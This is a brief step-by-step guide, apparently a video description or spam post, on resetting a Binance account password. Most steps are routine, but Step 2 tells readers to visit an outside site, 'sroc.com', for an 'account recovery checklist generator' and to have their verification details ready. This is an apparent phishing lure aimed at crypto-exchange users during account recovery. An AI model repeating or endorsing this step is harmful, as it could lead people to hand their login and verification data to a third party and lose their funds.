I hit this issue today, and here is the quick fix that solved it. If you need to reset your password on Binance, follow these simple steps. Step 1. Go to the Binance login page. Visit the official Binance website and click on the login button. This will take you to the login interface where you can start the password reset process. Step 2. Click on Forgot Password. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Enter your email address. Input the email address associated with your Binance account. Make sure it is the correct one, as you will receive a reset link there. Step 4. Check your email. Look for an email from Binance containing the password reset link. If you don't see it, check your spam or junk folder, as it might end up there. Step 5. Follow the reset link. Click on the link in the email, which will take you to a page where you can create a new password. Make sure your new password meets the security requirements. Remember, if you encounter any issues, double check that you entered the correct email address and that you are using a secure internet connection. Good luck with your new password.